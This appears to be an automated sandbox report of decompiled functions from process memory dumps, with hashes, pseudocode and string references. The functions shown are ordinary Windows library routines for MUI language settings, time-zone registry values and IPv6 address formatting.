
Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2207821743.0000000000920000.00000040.00000001.sdmp, Offset: 00910000, based on PE: true

Associated: 00000008.00000002.2207816746.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207956121.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207961062.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207967382.0000000000A14000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207973560.0000000000A17000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207977936.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2208032884.0000000000A80000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
Instruction ID: 5af6445773ea8696aa9cd62fdf5509cf1cb9f7b4cf56a5a77559796e3d2133fe
Opcode Fuzzy Hash: 975dfa9cf9b8080f9d0320802deb543160739c3189efc7d7e2a617800603798d
Instruction Fuzzy Hash: 07B012B2240540C7E30D9714D906B4B7250FBC0F00F00893AE10B81850DA3C993CC44B

Uniqueness

Uniqueness Score: -1.00%

Function 0092FF34, Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000008.00000002.2207821743.0000000000920000.00000040.00000001.sdmp, Offset: 00910000, based on PE: true

Associated: 00000008.00000002.2207816746.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207956121.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207961062.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207967382.0000000000A14000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207973560.0000000000A17000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207977936.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2208032884.0000000000A80000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
Instruction ID: c0177d7ad0d10355b3c7d2619bc7f24452a3c2aab25a1a733e07692cdee9b307
Opcode Fuzzy Hash: 6e5e409cf338bac94f49896e83b2b8a287e5016741aed655f6c9dd643cd52d5d
Instruction Fuzzy Hash: B1B012B2200540C7E319D714D906F4B7210FB80F00F40893AB10B81862DB3C992CD45A

Uniqueness

Uniqueness Score: -1.00%

Function 00958788, Relevance: 19.7, APIs: 6, Strings: 5, Instructions: 431
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E00958788(signed int __ecx, void* __edx, signed int _a4) {
				signed int _v8;
				short* _v12;
				void* _v16;
				signed int _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				void* _t216;
				intOrPtr _t231;
				short* _t235;
				intOrPtr _t257;
				short* _t261;
				intOrPtr _t284;
				intOrPtr _t288;
				void* _t314;
				signed int _t318;
				short* _t319;
				intOrPtr _t321;
				void* _t328;
				void* _t329;
				char* _t332;
				signed int _t333;
				signed int* _t334;
				void* _t335;
				void* _t338;
				void* _t339;

				_t328 = __edx;
				_t322 = __ecx;
				_t318 = 0;
				_t334 = _a4;
				_v8 = 0;
				_v28 = 0;
				_v48 = 0;
				_v20 = 0;
				_v40 = 0;
				_v32 = 0;
				_v52 = 0;
				if(_t334 == 0) {
					_t329 = 0xc000000d;
					L49:
					_t334[0x11] = _v56;
					 *_t334 =  *_t334 | 0x00000800;
					_t334[0x12] = _v60;
					_t334[0x13] = _v28;
					_t334[0x17] = _v20;
					_t334[0x16] = _v48;
					_t334[0x18] = _v40;
					_t334[0x14] = _v32;
					_t334[0x15] = _v52;
					return _t329;
				}
				_v56 = 0;
				if(E00958460(__ecx, L"WindowsExcludedProcs",  &_v44,  &_v24,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						_t207 = E0093E025(__ecx,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
					}
					_push(1);
					_v8 = _t318;
					E0095718A(_t207);
					_t335 = _t335 + 4;
				}
				_v60 = _v60 | 0xffffffff;
				if(E00958460(_t322, L"Kernel-MUI-Number-Allowed",  &_v44,  &_v24,  &_v8) >= 0) {
					_t333 =  *_v8;
					_v60 = _t333;
					_t314 = E0093E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					_push(_t333);
					_v8 = _t318;
					E0095718A(_t314);
					_t335 = _t335 + 4;
				}
				_t216 = E00958460(_t322, L"Kernel-MUI-Language-Allowed",  &_v44,  &_v24,  &_v8);
				_t332 = ";";
				if(_t216 < 0) {
					L17:
					if(E00958460(_t322, L"Kernel-MUI-Language-Disallowed",  &_v44,  &_v24,  &_v8) < 0) {
						L30:
						if(E00958460(_t322, L"Kernel-MUI-Language-SKU",  &_v44,  &_v24,  &_v8) < 0) {
							L46:
							_t329 = 0;
							L47:
							if(_v8 != _t318) {
								E0093E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
							}
							if(_v28 != _t318) {
								if(_v20 != _t318) {
									E0093E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
									_v20 = _t318;
									_v40 = _t318;
								}
							}
							goto L49;
						}
						_t231 = _v24;
						_t322 = _t231 + 4;
						_push(_t231);
						_v52 = _t322;
						E0095718A(_t231);
						if(_t322 == _t318) {
							_v32 = _t318;
						} else {
							_v32 = E0093E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
						}
						if(_v32 == _t318) {
							_v52 = _t318;
							L58:
							_t329 = 0xc0000017;
							goto L47;
						} else {
							E00932340(_v32, _v8, _v24);
							_v16 = _v32;
							_a4 = _t318;
							_t235 = E0094E679(_v32, _t332);
							while(1) {
								_t319 = _t235;
								if(_t319 == 0) {
									break;
								}
								 *_t319 = 0;
								_t321 = _t319 + 2;
								E0093E2A8(_t322,  &_v68, _v16);
								if(E00955553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
								_v16 = _t321;
								_t235 = E0094E679(_t321, _t332);
								_pop(_t322);
							}
							_t236 = _v16;
							if( *_v16 != _t319) {
								E0093E2A8(_t322,  &_v68, _t236);
								if(E00955553(_t328,  &_v68,  &_v36) != 0) {
									_a4 = _a4 + 1;
								}
							}
							if(_a4 == 0) {
								E0093E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v32);
								_v52 = _v52 & 0x00000000;
								_v32 = _v32 & 0x00000000;
							}
							if(_v8 != 0) {
								E0093E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v8);
							}
							_v8 = _v8 & 0x00000000;
							_t318 = 0;
							goto L46;
						}
					}
					_t257 = _v24;
					_t322 = _t257 + 4;
					_push(_t257);
					_v40 = _t322;
					E0095718A(_t257);
					_t338 = _t335 + 4;
					if(_t322 == _t318) {
						_v20 = _t318;
					} else {
						_v20 = E0093E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
					}
					if(_v20 == _t318) {
						_v40 = _t318;
						goto L58;
					} else {
						E00932340(_v20, _v8, _v24);
						_v16 = _v20;
						_a4 = _t318;
						_t261 = E0094E679(_v20, _t332);
						_t335 = _t338 + 0x14;
						while(1) {
							_v12 = _t261;
							if(_t261 == _t318) {
								break;
							}
							_v12 = _v12 + 2;
							 *_v12 = 0;
							E0093E2A8(_v12,  &_v68, _v16);
							if(E00955553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
							_v16 = _v12;
							_t261 = E0094E679(_v12, _t332);
							_pop(_t322);
						}
						_t269 = _v16;
						if( *_v16 != _t318) {
							E0093E2A8(_t322,  &_v68, _t269);
							if(E00955553(_t328,  &_v68,  &_v36) != 0) {
								_a4 = _a4 + 1;
							}
						}
						if(_a4 == _t318) {
							E0093E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v20);
							_v40 = _t318;
							_v20 = _t318;
						}
						if(_v8 != _t318) {
							E0093E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
						}
						_v8 = _t318;
						goto L30;
					}
				}
				_t284 = _v24;
				_t322 = _t284 + 4;
				_push(_t284);
				_v48 = _t322;
				E0095718A(_t284);
				_t339 = _t335 + 4;
				if(_t322 == _t318) {
					_v28 = _t318;
				} else {
					_v28 = E0093E0C6( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 8, _t322);
				}
				if(_v28 == _t318) {
					_v48 = _t318;
					goto L58;
				} else {
					E00932340(_v28, _v8, _v24);
					_v16 = _v28;
					_a4 = _t318;
					_t288 = E0094E679(_v28, _t332);
					_t335 = _t339 + 0x14;
					while(1) {
						_v12 = _t288;
						if(_t288 == _t318) {
							break;
						}
						_v12 = _v12 + 2;
						 *_v12 = 0;
						E0093E2A8(_v12,  &_v68, _v16);
						if(E00955553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
						_v16 = _v12;
						_t288 = E0094E679(_v12, _t332);
						_pop(_t322);
					}
					_t296 = _v16;
					if( *_v16 != _t318) {
						E0093E2A8(_t322,  &_v68, _t296);
						if(E00955553(_t328,  &_v68,  &_v36) != 0) {
							_a4 = _a4 + 1;
						}
					}
					if(_a4 == _t318) {
						E0093E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v28);
						_v48 = _t318;
						_v28 = _t318;
					}
					if(_v8 != _t318) {
						E0093E025(_t322,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), _t318, _v8);
					}
					_v8 = _t318;
					goto L17;
				}
			}

0x00958788
0x00958788
0x00958791
0x00958794
0x00958798
0x0095879b
0x0095879e
0x009587a1
0x009587a4
0x009587a7
0x009587aa
0x009587af
0x009a1ad3
0x00958b0a
0x00958b0d
0x00958b13
0x00958b19
0x00958b1f
0x00958b25
0x00958b2b
0x00958b31
0x00958b37
0x00958b3d
0x00958b46
0x00958b46
0x009587c6
0x009587d0
0x009a1ae0
0x009a1ae6
0x009a1af8
0x009a1af8
0x009a1afd
0x009a1afe
0x009a1b01
0x009a1b06
0x009a1b06
0x009587d6
0x009587f2
0x009587f7
0x00958807
0x0095880a
0x0095880f
0x00958810
0x00958813
0x00958818
0x00958818
0x0095882c
0x00958831
0x00958838
0x00958908
0x00958920
0x009589f0
0x00958a08
0x00958af6
0x00958af6
0x00958af8
0x00958afb
0x009a1beb
0x009a1beb
0x00958b04
0x009a1bf8
0x009a1c0e
0x009a1c13
0x009a1c16
0x009a1c16
0x009a1bf8
0x00000000
0x00958b04
0x00958a0e
0x00958a11
0x00958a14
0x00958a15
0x00958a18
0x00958a22
0x00958b59
0x00958a28
0x00958a3c
0x00958a3c
0x00958a42
0x009a1bb0
0x009a1b11
0x009a1b11
0x00000000
0x00958a48
0x00958a51
0x00958a5b
0x00958a5e
0x00958a61
0x00958a69
0x00958a69
0x00958a6d
0x00000000
0x00000000
0x00958a74
0x00958a7c
0x00958a7d
0x00958a91
0x00958a93
0x00958a93
0x00958a98
0x00958a9b
0x00958aa1
0x00958aa1
0x00958aa4
0x00958aaa
0x00958ab1
0x00958ac5
0x00958ac7
0x00958ac7
0x00958ac5
0x00958ace
0x009a1bc9
0x009a1bce
0x009a1bd2
0x009a1bd2
0x00958ad8
0x00958aeb
0x00958aeb
0x00958af0
0x00958af4
0x00000000
0x00958af4
0x00958a42
0x00958926
0x00958929
0x0095892c
0x0095892d
0x00958930
0x00958935
0x0095893a
0x00958b51
0x00958940
0x00958954
0x00958954
0x0095895a
0x009a1b63
0x00000000
0x00958960
0x00958969
0x00958973
0x00958976
0x00958979
0x0095897e
0x00958981
0x00958981
0x00958986
0x00000000
0x00000000
0x009a1b6e
0x009a1b74
0x009a1b7b
0x009a1b8f
0x009a1b91
0x009a1b91
0x009a1b99
0x009a1b9c
0x009a1ba2
0x009a1ba2
0x0095898c
0x00958992
0x00958999
0x009589ad
0x009a1ba8
0x009a1ba8
0x009589ad
0x009589b6
0x009589c8
0x009589cd
0x009589d0
0x009589d0
0x009589d6
0x009589e8
0x009589e8
0x009589ed
0x00000000
0x009589ed
0x0095895a
0x0095883e
0x00958841
0x00958844
0x00958845
0x00958848
0x0095884d
0x00958852
0x00958b49
0x00958858
0x0095886c
0x0095886c
0x00958872
0x009a1b0e
0x00000000
0x00958878
0x00958881
0x0095888b
0x0095888e
0x00958891
0x00958896
0x00958899
0x00958899
0x0095889e
0x00000000
0x00000000
0x009a1b21
0x009a1b27
0x009a1b2e
0x009a1b42
0x009a1b44
0x009a1b44
0x009a1b4c
0x009a1b4f
0x009a1b55
0x009a1b55
0x009588a4
0x009588aa
0x009588b1
0x009588c5
0x009a1b5b
0x009a1b5b
0x009588c5
0x009588ce
0x009588e0
0x009588e5
0x009588e8
0x009588e8
0x009588ee
0x00958900
0x00958900
0x00958905
0x00000000
0x00958905

APIs

_wcspbrk.LIBCMT ref: 00958891
_wcspbrk.LIBCMT ref: 00958979
_wcspbrk.LIBCMT ref: 00958A61
_wcspbrk.LIBCMT ref: 00958A9B
_wcspbrk.LIBCMT ref: 009A1B9C

Strings

Kernel-MUI-Language-SKU, xrefs: 009589FC
WindowsExcludedProcs, xrefs: 009587C1
Kernel-MUI-Number-Allowed, xrefs: 009587E6
Kernel-MUI-Language-Disallowed, xrefs: 00958914
Kernel-MUI-Language-Allowed, xrefs: 00958827

Memory Dump Source

Source File: 00000008.00000002.2207821743.0000000000920000.00000040.00000001.sdmp, Offset: 00910000, based on PE: true

Associated: 00000008.00000002.2207816746.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207956121.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207961062.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207967382.0000000000A14000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207973560.0000000000A17000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207977936.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2208032884.0000000000A80000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcspbrk
String ID: Kernel-MUI-Language-Allowed$Kernel-MUI-Language-Disallowed$Kernel-MUI-Language-SKU$Kernel-MUI-Number-Allowed$WindowsExcludedProcs
API String ID: 402402107-258546922
Opcode ID: 87413ef547ccdb6fbe09eab441b72819b47c2e961a663d6896d9b602141beab3
Instruction ID: e8b3701021a61ebd1dc8a789da011c265c38ed4dee8ad9cd976a7f4e0239a653
Opcode Fuzzy Hash: 87413ef547ccdb6fbe09eab441b72819b47c2e961a663d6896d9b602141beab3
Instruction Fuzzy Hash: B3F1D5B2D00209EFCF11DF96C981AEEB7B8FF48301F15446AE905A7251EB349A45DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 009C822C, Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 160
COMMON

Download Yara Rule

C-Code - Quality: 95%

			E009C822C(void* __ecx, void* __edx, signed int _a4, signed int _a8) {
				char _v8;
				void* __ebx;
				signed int _t41;
				void* _t42;
				signed int* _t50;
				void* _t71;
				void* _t73;
				void* _t78;
				signed int _t81;
				void* _t84;

				_push(__ecx);
				_t81 = _a4;
				_t84 = 0x20;
				_t71 = E009E5A34(_t81 + 4, _t84);
				if(_t71 < _t84) {
					_t41 = E009E5A34(_t81 + 0x58, _t84);
					_pop(_t78);
					_a4 = _t41;
					__eflags = _t41 - _t84;
					if(_t41 >= _t84) {
						goto L1;
					} else {
						_t42 = E00987DCD(1,  &_v8);
						__eflags = _t42;
						if(__eflags >= 0) {
							__eflags = E009C810D(_t71, _t78, __eflags, 0x40000000, _v8, L"Bias", 4, _t81, 4);
							if(__eflags < 0) {
								L14:
								_a4 = 0;
								_t73 = E009C810D(_t71, _t78, __eflags, 0x40000000, _v8, L"TimeZoneKeyName", 1,  &_a4, 2);
								__eflags = _t73;
								if(__eflags >= 0) {
									_a8 =  *(_t81 + 0x1ac) & 0x000000ff;
									_t50 =  &_a8;
									goto L16;
								}
							} else {
								_t8 = _t71 + 2; // 0x2
								__eflags = E009C810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardName", 1, _t81 + 4, _t71 + _t8);
								if(__eflags < 0) {
									goto L14;
								} else {
									_t71 = 4;
									__eflags = E009C810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardBias", _t71, _t81 + 0x54, _t71);
									if(__eflags < 0) {
										goto L14;
									} else {
										__eflags = E009C810D(_t71, _t78, __eflags, 0x40000000, _v8, L"StandardStart", 3, _t81 + 0x44, 0x10);
										if(__eflags < 0) {
											goto L14;
										} else {
											__eflags = E009C810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightName", 1, _t81 + 0x58, _a4 + _a4 + 2);
											if(__eflags < 0) {
												goto L14;
											} else {
												__eflags = E009C810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightBias", _t71, _t81 + 0xa8, _t71);
												if(__eflags < 0) {
													goto L14;
												} else {
													__eflags = E009C810D(_t71, _t78, __eflags, 0x40000000, _v8, L"DaylightStart", 3, _t81 + 0x98, 0x10);
													if(__eflags < 0) {
														goto L14;
													} else {
														__eflags = _a8 - 0x1b0;
														if(__eflags < 0) {
															goto L14;
														} else {
															_t73 = E009C810D(_t71, _t78, __eflags, 0x40000000, _v8, L"TimeZoneKeyName", 1, _t81 + 0xac, 0x100);
															__eflags = _t73;
															if(__eflags >= 0) {
																_a4 =  *(_t81 + 0x1ac) & 0x000000ff;
																_t50 =  &_a4;
																L16:
																_t73 = E009C810D(_t73, _t78, __eflags, 0x40000000, _v8, L"DynamicDaylightTimeDisabled", 4, _t50, 4);
															}
														}
													}
												}
											}
										}
									}
								}
							}
							E0092F9F0(_v8);
							_t42 = _t73;
						}
					}
				} else {
					L1:
					_t42 = 0xc000000d;
				}
				return _t42;
			}

0x009c8231
0x009c8235
0x009c823a
0x009c8245
0x009c824b
0x009c825c
0x009c8262
0x009c8263
0x009c8266
0x009c8268
0x00000000
0x009c826a
0x009c8270
0x009c8275
0x009c8277
0x009c8295
0x009c8297
0x009c838d
0x009c8391
0x009c83a9
0x009c83ab
0x009c83ad
0x009c83b6
0x009c83b9
0x00000000
0x009c83b9
0x009c829d
0x009c829d
0x009c82b6
0x009c82b8
0x00000000
0x009c82be
0x009c82c0
0x009c82d5
0x009c82d7
0x00000000
0x009c82dd
0x009c82f3
0x009c82f5
0x00000000
0x009c82fb
0x009c8317
0x009c8319
0x00000000
0x009c831b
0x009c8332
0x009c8334
0x00000000
0x009c8336
0x009c834f
0x009c8351
0x00000000
0x009c8353
0x009c8353
0x009c835a
0x00000000
0x009c835c
0x009c8378
0x009c837a
0x009c837c
0x009c8385
0x009c8388
0x009c83bc
0x009c83cf
0x009c83cf
0x009c837c
0x009c835a
0x009c8351
0x009c8334
0x009c8319
0x009c82f5
0x009c82d7
0x009c82b8
0x009c83d4
0x009c83d9
0x009c83d9
0x009c8277
0x009c824d
0x009c824d
0x009c824d
0x009c824d
0x009c83df

APIs

_wcsnlen.LIBCMT ref: 009C8240
_wcsnlen.LIBCMT ref: 009C825C

Strings

DaylightStart, xrefs: 009C8341
StandardStart, xrefs: 009C82E5
DaylightName, xrefs: 009C8309
TimeZoneKeyName, xrefs: 009C836A, 009C839B
DaylightBias, xrefs: 009C8324
DynamicDaylightTimeDisabled, xrefs: 009C83C1
Bias, xrefs: 009C8282
StandardName, xrefs: 009C82A8
StandardBias, xrefs: 009C82C7

Memory Dump Source

Source File: 00000008.00000002.2207821743.0000000000920000.00000040.00000001.sdmp, Offset: 00910000, based on PE: true

Associated: 00000008.00000002.2207816746.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207956121.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207961062.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207967382.0000000000A14000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207973560.0000000000A17000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207977936.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2208032884.0000000000A80000.00000040.00000001.sdmp Download File

Similarity

API ID: _wcsnlen
String ID: Bias$DaylightBias$DaylightName$DaylightStart$DynamicDaylightTimeDisabled$StandardBias$StandardName$StandardStart$TimeZoneKeyName
API String ID: 3628947076-1387797911
Opcode ID: b13f3d68c79acec5f358a7578b415942f12ba90ea17295455ffd108e36e953e9
Instruction ID: 1217c518f3aa6349e409d0c9083c520874b7474da1c2b5a52c86ac6ff1aa4ef7
Opcode Fuzzy Hash: b13f3d68c79acec5f358a7578b415942f12ba90ea17295455ffd108e36e953e9
Instruction Fuzzy Hash: 1C41E972758359BAEB029AD1CC42FDFB7ACAF85B44F100126FA04D6191DBB0DB0187A5

Uniqueness

Uniqueness Score: -1.00%

Function 009713CB, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 195
COMMON

Download Yara Rule

C-Code - Quality: 38%

			E009713CB(intOrPtr* _a4, intOrPtr _a8) {
				char _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				intOrPtr _v20;
				char _v24;
				intOrPtr _t71;
				signed int _t78;
				signed int _t86;
				char _t90;
				signed int _t91;
				signed int _t96;
				intOrPtr _t108;
				signed int _t114;
				void* _t115;
				intOrPtr _t128;
				intOrPtr* _t129;
				void* _t130;

				_t129 = _a4;
				_t128 = _a8;
				_t116 = 0;
				_t71 = _t128 + 0x5c;
				_v8 = 8;
				_v20 = _t71;
				if( *_t129 == 0) {
					if( *((intOrPtr*)(_t129 + 2)) != 0 ||  *((intOrPtr*)(_t129 + 4)) != 0 ||  *((intOrPtr*)(_t129 + 6)) != 0 ||  *(_t129 + 0xc) == 0) {
						goto L5;
					} else {
						_t96 =  *(_t129 + 8) & 0x0000ffff;
						if(_t96 != 0) {
							L38:
							if(_t96 != 0xffff ||  *(_t129 + 0xa) != _t116) {
								goto L5;
							} else {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t86 = E00967707(_t128, _t71 - _t128 >> 1, L"::ffff:0:%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff);
								L36:
								return _t128 + _t86 * 2;
							}
						}
						_t114 =  *(_t129 + 0xa) & 0x0000ffff;
						if(_t114 == 0) {
							L33:
							_t115 = 0x932926;
							L35:
							_push( *(_t129 + 0xf) & 0x000000ff);
							_push( *(_t129 + 0xe) & 0x000000ff);
							_push( *(_t129 + 0xd) & 0x000000ff);
							_push( *(_t129 + 0xc) & 0x000000ff);
							_t86 = E00967707(_t128, _t71 - _t128 >> 1, L"::%hs%u.%u.%u.%u", _t115);
							goto L36;
						}
						if(_t114 != 0xffff) {
							_t116 = 0;
							goto L38;
						}
						if(_t114 != 0) {
							_t115 = 0x939cac;
							goto L35;
						}
						goto L33;
					}
				} else {
					L5:
					_a8 = _t116;
					_a4 = _t116;
					_v12 = _t116;
					if(( *(_t129 + 8) & 0x0000fffd) == 0) {
						if( *(_t129 + 0xa) == 0xfe5e) {
							_v8 = 6;
						}
					}
					_t90 = _v8;
					if(_t90 <= _t116) {
						L11:
						if(_a8 - _a4 <= 1) {
							_a8 = _t116;
							_a4 = _t116;
						}
						_t91 = 0;
						if(_v8 <= _t116) {
							L22:
							if(_v8 < 8) {
								_push( *(_t129 + 0xf) & 0x000000ff);
								_push( *(_t129 + 0xe) & 0x000000ff);
								_push( *(_t129 + 0xd) & 0x000000ff);
								_t128 = _t128 + E00967707(_t128, _t71 - _t128 >> 1, L":%u.%u.%u.%u",  *(_t129 + 0xc) & 0x000000ff) * 2;
							}
							return _t128;
						} else {
							L14:
							L14:
							if(_a4 > _t91 || _t91 >= _a8) {
								if(_t91 != _t116 && _t91 != _a8) {
									_push(":");
									_push(_t71 - _t128 >> 1);
									_push(_t128);
									_t128 = _t128 + E00967707() * 2;
									_t71 = _v20;
									_t130 = _t130 + 0xc;
								}
								_t78 = E00967707(_t128, _t71 - _t128 >> 1, L"%x",  *(_t129 + _t91 * 2) & 0x0000ffff);
								_t130 = _t130 + 0x10;
							} else {
								_push(L"::");
								_push(_t71 - _t128 >> 1);
								_push(_t128);
								_t78 = E00967707();
								_t130 = _t130 + 0xc;
								_t91 = _a8 - 1;
							}
							_t91 = _t91 + 1;
							_t128 = _t128 + _t78 * 2;
							_t71 = _v20;
							if(_t91 >= _v8) {
								goto L22;
							}
							_t116 = 0;
							goto L14;
						}
					} else {
						_t108 = 1;
						_v16 = _t129;
						_v24 = _t90;
						do {
							if( *_v16 == _t116) {
								if(_t108 - _v12 > _a8 - _a4) {
									_a4 = _v12;
									_a8 = _t108;
								}
								_t116 = 0;
							} else {
								_v12 = _t108;
							}
							_v16 = _v16 + 2;
							_t108 = _t108 + 1;
							_t26 =  &_v24;
							 *_t26 = _v24 - 1;
						} while ( *_t26 != 0);
						goto L11;
					}
				}
			}

0x009713d5
0x009713d9
0x009713dc
0x009713de
0x009713e1
0x009713e8
0x009713ee
0x0099e8fd
0x00000000
0x0099e921
0x0099e921
0x0099e928
0x0099e982
0x0099e98a
0x00000000
0x0099e99a
0x0099e99e
0x0099e9a3
0x0099e9a8
0x0099e9b9
0x0099e978
0x00000000
0x0099e978
0x0099e98a
0x0099e92a
0x0099e931
0x0099e944
0x0099e944
0x0099e950
0x0099e954
0x0099e959
0x0099e95e
0x0099e963
0x0099e970
0x00000000
0x0099e975
0x0099e93b
0x0099e980
0x00000000
0x0099e980
0x0099e942
0x0099e94b
0x00000000
0x0099e94b
0x00000000
0x0099e942
0x009713f4
0x009713f4
0x009713f9
0x009713fc
0x009713ff
0x00971406
0x0099e9cc
0x0099e9d2
0x0099e9d2
0x0099e9cc
0x0097140c
0x00971411
0x00971431
0x0097143a
0x0097143c
0x0097143f
0x0097143f
0x00971442
0x00971447
0x009714a8
0x009714ac
0x0099e9e2
0x0099e9e7
0x0099e9ec
0x0099ea05
0x0099ea05
0x00000000
0x00971449
0x00000000
0x00971449
0x0097144c
0x00971459
0x00971462
0x00971469
0x0097146a
0x00971470
0x00971473
0x00971476
0x00971476
0x00971490
0x00971495
0x0097138e
0x00971390
0x00971397
0x00971398
0x00971399
0x009713a1
0x009713a4
0x009713a4
0x00971498
0x0097149c
0x0097149f
0x009714a2
0x00000000
0x00000000
0x009714a4
0x00000000
0x009714a4
0x00971413
0x00971415
0x00971416
0x00971419
0x0097141c
0x00971422
0x009713b7
0x009713bc
0x009713bf
0x009713bf
0x009713c2
0x00971424
0x00971424
0x00971424
0x00971427
0x0097142b
0x0097142c
0x0097142c
0x0097142c
0x00000000
0x0097141c
0x00971411

APIs

___swprintf_l.LIBCMT ref: 0097146B
___swprintf_l.LIBCMT ref: 00971490
___swprintf_l.LIBCMT ref: 0099E970

Strings

ffff:, xrefs: 0099E94B
::ffff:0:%u.%u.%u.%u, xrefs: 0099E9B0
::%hs%u.%u.%u.%u, xrefs: 0099E967
:%u.%u.%u.%u, xrefs: 0099E9F4

Memory Dump Source

Source File: 00000008.00000002.2207821743.0000000000920000.00000040.00000001.sdmp, Offset: 00910000, based on PE: true

Associated: 00000008.00000002.2207816746.0000000000910000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207956121.0000000000A00000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207961062.0000000000A10000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207967382.0000000000A14000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207973560.0000000000A17000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2207977936.0000000000A20000.00000040.00000001.sdmp Download File
Associated: 00000008.00000002.2208032884.0000000000A80000.00000040.00000001.sdmp Download File

Similarity

API ID: ___swprintf_l
String ID: :%u.%u.%u.%u$::%hs%u.%u.%u.%u$::ffff:0:%u.%u.%u.%u$ffff:
API String ID: 48624451-2108815105
Opcode ID: 36097f28cae554cc9adf0a6b52e134e30c1e03b005bd9d968e174c6737a02786
Instruction ID: a67010f61c8042bb1425e8c07321d903fbad19a37b0c7b82d578ab304e89c1d9
Opcode Fuzzy Hash: 36097f28cae554cc9adf0a6b52e134e30c1e03b005bd9d968e174c6737a02786
Instruction Fuzzy Hash: EC6114B2904655ABCF34CF9DC8819BEBBB9EFD4304B14C52DF4DA47681D674AA40CB60

Uniqueness

Uniqueness Score: -1.00%

Function 009D3B8E, Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 187
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E009D3B8E(intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				void* _t84;
				void* _t87;
				intOrPtr* _t97;
				void* _t104;
				void* _t106;
				void* _t109;
				intOrPtr _t116;
				signed int _t117;
				signed int _t122;
				signed int _t126;
				char _t127;
				signed int _t128;
				intOrPtr* _t133;
				void* _t134;

				_t133 = _a4;
				_t122 = 0;
